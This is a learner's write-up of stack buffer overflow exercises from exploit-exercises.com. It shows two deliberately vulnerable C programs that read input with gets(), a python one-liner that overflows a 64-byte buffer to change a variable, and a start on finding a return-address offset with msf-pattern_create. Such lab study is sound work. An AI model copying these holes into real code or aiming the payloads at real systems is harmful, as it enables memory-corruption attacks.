To better grasp the understanding of Bufferoverflows I decided to make and document some exercises with this topic.
The exploit exercises are mainly from exploit-exercises.com.
Stackoverflow - When the execution stack grows beyond the memory that is reserved for it
Bufferoverflow - When a programm writes beyond the end of the memory allocated for any buffer (Heap & Stack).
I will use Kali Linux and the checksec script.
To compile to 32bit in a 64bit kali instance install the dependencies
apt-get install gcc-multilib
and compile with the additional flag
gcc -m32 -o [Output] [Input]
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
printf("%x\n", modified);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
First compile the programm with
gcc -o stack0 stack0.c
The buffer size is 64 Byte and if you supply more then 64 Byte the Buffer will overflow.
The printf will show us the bytes we gave the programm as an argument, which overwitten the modified variable.
This output will be reversed because Intel CPUs use little Endian.
If we input this:
python -c 'print "A"*76 + "123456789"' | ./stack0
It will print in python 76 times "A" in Ascii x41 and then append "123456789".
The output of the programm looks like this:
34333231
you have changed the 'modified' variable
The first line is the modified variable which contains 1234 but in ASCII and little endian.
4 = 34
3 = 33
2 = 32
1 = 31
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
Create a unique pattern to see where you are overriding RDI.
msf-pattern_create -l 120